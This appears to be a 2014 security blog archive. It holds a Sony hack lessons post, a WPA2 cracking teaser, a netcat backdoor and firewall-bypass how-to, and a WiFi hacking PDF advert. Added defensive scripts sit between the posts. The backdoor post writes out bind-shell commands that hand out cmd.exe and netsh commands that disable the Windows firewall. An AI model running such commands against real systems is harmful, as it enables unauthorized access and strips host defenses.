Friday, 26 December 2014

Best Cyber trend news:

https://www.riskbasedsecurity.com/2014/12/a-breakdown-and-analysis-of-the-december-2014-sony-hack/

Keep yourself up to date!

The Sony Pictures Hack: 5 short sharp lessons we all can learn!

The recent hacking of Sony Pictures offers valuable lessons in cybersecurity from which every company and consumer can learn. When you set aside the politics and gossip about nation states and Hollywood celebs, some practical implications are clear:

1. Don’t use email for sensitive communications

Why? If you need to ask you haven’t been reading the emails that hackers found on Sony Pictures’ computers and then leaked over the last few weeks. These join the countless other embarrassing and/or incriminating emails and images leaked over the years from assorted companies and government agencies. As the lawsuits against Sony Pictures mount, plaintiffs already possess evidence of the company’s lack of due care, no subpoena required. This evidence includes a critical IT auditor’s report that was reportedly shared via email as an unencrypted attachment.
Just to be clear: email is not a secure channel of communication. By default, email travels in plain text, readable to anyone snooping on the many connections and servers through which it travels. And emails that you send to someone are only as secure as that recipient and their computer. As for sharing sensitive documents as unencrypted email attachments, that should be against company policy, with severe repercussions for violators, whether they are C-level executives or hourly employees.
A good rule to live by is this: Never put anything in a digital communication that you wouldn’t want your mother (or enemies) to see. At this point in time, and for the foreseeable future, nobody can guarantee that those digital communications will never be hacked, leaked, subpoenaed, or otherwise made public. This applies to text messages, comments on web pages, messages on forums, and picture-sharing as well as email. In other words, this is really basic cyber-hygiene that has been common knowledge for decades, a fact that makes Sony Pictures’ apparent ignorance of digital realities all the more shocking.

2. Don’t give everybody access to everything

We’ve said it before and we’ll say it again: classify your documents and segment your networks. Sony Pictures could have saved itself a lot of grief if it had been enforcing a classification system that branded documents like contracts with actors and directors as Top Secret, and a policy that forbade the storing of Top Secret documents in an Internet-accessible database. Too many organizations have grown their networks with maximum convenience in mind, effectively giving access to everything to everyone. Unfortunately, that means access to outsiders as well if there is even a small chink in your cyber-defenses.
Networks need to be segmented, with access controls between them to limit who can see what. Target learned this lesson the hard way last year, when hackers found it was possible to get from a supplier portal that the retailer had created, all the way to the card payment terminals in its stores. Now would be a good time to audit your networks for inappropriate connections and unfiltered access.

3. Don’t store passwords in a file called passwords

This lesson is as head-slappingly obvious as “Don’t write down your workstation password on a Post-it note and stick it to your monitor.” Yes, passwords are a pain, but there are secure methods of managing them. The failure of Sony Pictures to enforce a policy of not storing passwords in plain-easy-to-read-text will be one of the biggest strikes against them in court when employees whose privacy was violated in this attack bring suits claiming negligence.
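One way to audit a file share for this problem, as an added example that is not part of the original article: walk a directory tree and flag files whose names suggest a credential list or whose text contains lines that look like plaintext credentials. The name pattern, the content pattern, the extension list and the sample tree are constructed assumptions.

```python
import os
import re
import tempfile

# Assumed heuristics (not from the article): file names that suggest a credential
# list, and lines of the form "password: value" or "pwd = value" in text files.
NAME_HINT = re.compile(r"passw(or)?d|pwd|credential", re.IGNORECASE)
SECRET_LINE = re.compile(r"^\s*(pass(word)?|pwd)\s*[:=]\s*\S+", re.I | re.M)
TEXT_EXT = {".txt", ".csv", ".ini", ".cfg", ".log"}

def audit_tree(root):
    """Return sorted (relative path, reasons, matching-line count) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons, hits = [], 0
            if NAME_HINT.search(name):
                reasons.append("name")
            if os.path.splitext(name)[1].lower() in TEXT_EXT:
                try:
                    with open(path, "r", errors="replace") as fh:
                        # Read at most ~1 MB of each file
                        hits = len(SECRET_LINE.findall(fh.read(1_000_000)))
                except OSError:
                    hits = 0  # unreadable: still report a name match
                if hits:
                    reasons.append("content")
            if reasons:  # report counts only, never the matched values
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, reasons, hits))
    return sorted(findings)

def demo():
    """Build a small constructed tree in a temp directory and audit it."""
    sample = {
        "finance/Passwords.txt": "vpn\nuser: alice\npassword: example-not-real\n",
        "it/servers.cfg": "host=db01\npwd = example-not-real\n",
        "hr/handbook.txt": "Reset your password at the help desk.\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in sample.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(body)
        return audit_tree(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Files that turn up should have their contents moved into a password manager or vault and the exposed credentials rotated.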

4. Don’t ignore warning signs and risks

Many “ordinary” computer users already know this: if something seems wrong, don’t ignore it. Take a screenshot, write down the error message, call support, run an antivirus scan. Sometimes it turns out to be nothing, or even a new feature you didn’t know about. Other times it means you are under attack. Various parts of the Sony empire have been under attack for years now and many attacks have succeeded. That should have told Sony executives that IT security was a priority, even before Sony Pictures decided to proceed with a movie that was 100% guaranteed to upset at least one nuclear-armed nation already suspected of carrying out cyber attacks. Consider this statement:
“I’ve lost count of how many times Sony’s online properties have been hacked now—I just don’t have that many fingers—but it’s happened again. Databases used to operate sonypictures.com, sonybmg.nl, and sonybmg.be have been compromised…using SQL injection…being susceptible to SQL injection is embarrassing enough…but what makes this hack even worse is the data that has been compromised…with one major feature in common: they included plaintext passwords.”
That was Peter Bright writing in Ars Technica in June of 2011. Three years later, in June of 2014, Sony Pictures released a teaser trailer for The Interview, a film graphically depicting the North Korean dictator’s head exploding (in a sequence without which the director, Seth Rogen, complained “the joke won’t”). In other words, Sony was forewarned, but not forearmed. We see a past history of weak security combined with a failure to tighten the hatches before proceeding with a project that was bound to cause anger in at least one part of the world.

5. Don’t go another day without an incident response plan

When news of the Sony Pictures breach started to leak, the company’s response demonstrated a lack of planning. Actions taken were sometimes contradictory or inflammatory. In short, the company clearly lacked an appropriate incident response plan. Why this should be is hard to fathom. One of the most consistent themes in IT security publications over the past few years has been: It’s not if you get hacked but when. In other words, any responsible organization will put in place a plan for responding to a breach. And stick to it when a breach occurs. Here’s a link to some good incident response advice that has been freely available for several years: NIST Special Publication 800-61 Revision 2: Computer Security Incident Handling Guide (.pdf).

Summary and sympathy

Some of these lessons are stark and obvious, but they should not obscure the fact that Sony Pictures has been victimized by criminal hackers. Drawing lessons from a crime is not the same as “victim blaming”. The failure to lock the door of your car does not make you culpable if it is stolen. We should never accept that crime is inevitable. At the same time, there are many layers of victimization in a crime of this magnitude. Current and former Sony employees who have had their lives turned upside down by the breach of privacy that these criminal hackers perpetrated have every right to seek redress from an organization that could fairly be said, just on the evidence published so far, to have failed the standard of due care for protection of its employees.
For additional perspective on this evolving situation, there is a good article in Businessweek and a detailed timeline on this blog. You might also want to monitor Krebs on Security, from Brian Krebs (he’s the guy who broke the Target breach story about this time last year, some lessons from which Sony failed to learn).

Saturday, 6 December 2014

HOW TO CRACK WPA2 USING A DICTIONARY ATTACK

Here is a tutorial showing you how to hack a WPA2 Wifi password by capturing a 4-way handshake and then running a dictionary attack against the capture file.
If you require a wordlist then I have linked a few below this video:

Best of Luck guys!

HOW TO BYPASS A FIREWALL ON A WEB SERVER

The key point of this paper is to discuss how to backdoor a Windows test server and bypass its firewall.
Here are a few steps to bypass the firewall easily:
Tools:
1. Netcat
Those who don’t know how to make a netcat backdoor must read this. If you’re only interested in bypassing the firewall, skip it.
First I will show you how to make a backdoor using netcat:
Upload netcat to the remote PC and open a listening port.
For example:
C:\>nc -l -p 8080
[on 192.168.9.2]
So here we are making 8080 the listening port.
The next step is to connect to 192.168.9.2 from the remote system.
For that we need to install netcat on 192.168.9.2 and execute the command prompt.
So here is the command we need to run on 192.168.9.2:
C:\>nc -l -p 8080 -e cmd.exe
You can use putty to connect.
Just type the address 192.168.9.2 and specify port no. 8080.
Once you connect you will get the command prompt; this way you can make a backdoor connection on the Windows server.
After getting the command prompt you can disable the firewall if required from the command line:
C:\>netsh firewall set opmode disable
Or use
C:\Windows\System32\netsh.exe "firewall set opmode = DISABLE profile = ALL"
When it comes to a real scenario, most web servers block RDP connections, in the sense that they block inbound traffic on port no. 3389.
[IIS Webserver]————-[=Firewall=]————-attacker
So the firewall rules will be:
Allow traffic on ports 80 and 443. Deny everything else.
So when we try to make an RDP connection from an external network, it fails. There are a few methods by which we can trick the firewall, by running netcat on 443 or any other open port on the server. We just need to run netcat on 443 because the firewall allows 443 traffic.
[Screenshot: putty]

OR YOU CAN USE RDP

[Screenshot: rdp]
The tools specified above can be freely downloaded online. You can contact me on egbe201@yahoo.com for further information. Best of Luck!
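Seen from the defender's side, the steps above leave two recognisable traces: a netsh command that switches the firewall off, and a listener on a firewall-allowed port owned by something other than the web server. The following is an added example, not part of the original post, that checks constructed process-creation command lines and listener records for both; the record shapes, the expected-owner table and the sample data are assumptions.

```python
import re

# Assumption: ports the perimeter firewall allows, mapped to the only process
# images expected to listen on them (IIS sockets are owned by "System" via http.sys).
EXPECTED_LISTENERS = {80: {"system"}, 443: {"system"}}

# netsh invocations that switch the Windows firewall off: the legacy syntax
# quoted in the post, plus the newer advfirewall form.
FIREWALL_OFF = re.compile(
    r"netsh(\.exe)?\b.*\b(firewall\s+set\s+opmode\s*=?\s*disable"
    r"|advfirewall\s+set\s+\w+\s+state\s+off)", re.IGNORECASE)
# A netcat listener started with -e hands a program to whoever connects.
EXEC_LISTENER = re.compile(r"\bnc(at)?(\.exe)?\b.*\s-e\s+\S+", re.IGNORECASE)

def check_command_line(cmdline):
    """Return the findings for one process-creation command line."""
    findings = []
    if FIREWALL_OFF.search(cmdline):
        findings.append("firewall-disabled")
    if EXEC_LISTENER.search(cmdline):
        findings.append("listener-with-exec")
    return findings

def check_listeners(listeners):
    """listeners: (port, image name) pairs. Flag unexpected owners of allowed ports."""
    return [(port, image) for port, image in listeners
            if port in EXPECTED_LISTENERS
            and image.lower() not in EXPECTED_LISTENERS[port]]

# Constructed sample records, e.g. as exported from process-creation auditing
# and from a listening-socket inventory.
SAMPLE_CMDLINES = [
    r'C:\Windows\System32\inetsrv\w3wp.exe -ap "DefaultAppPool"',
    r'C:\Temp\nc.exe -l -p 443 -e cmd.exe',
    r'netsh firewall set opmode disable',
    r'C:\Windows\System32\netsh.exe "firewall set opmode = DISABLE profile = ALL"',
    r'netsh advfirewall show allprofiles',
]
SAMPLE_LISTENERS = [(80, "System"), (443, "nc.exe"), (3389, "svchost.exe")]

def run_samples():
    hits = {c: f for c in SAMPLE_CMDLINES if (f := check_command_line(c))}
    return hits, check_listeners(SAMPLE_LISTENERS)

if __name__ == "__main__":
    hits, unexpected = run_samples()
    for cmdline, findings in hits.items():
        print(findings, cmdline)
    for port, image in unexpected:
        print("unexpected listener", port, image)
```

Filtering outbound traffic and permitting inbound 80/443 only to the web server process, rather than to the host as a whole, closes the gap the post relies on.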


Wednesday, 3 December 2014

DOWNLOAD FREE WIFI HACKING AND DEFENCE (PDF PRESENTATION) - This is only for educational purposes!


Here is a free WiFi hacking PDF that will teach you all about how the 802.11 protocol works, how to hack WEP, WPA, WPA2 and WPS, and how to protect against it.
1 – The following discussion is for informational and educational purposes only.
2 – Hacking into a private network without written permission from the owner is illegal and strictly forbidden.
3 – Misuse could result in breaking the law, so use it at your own risk.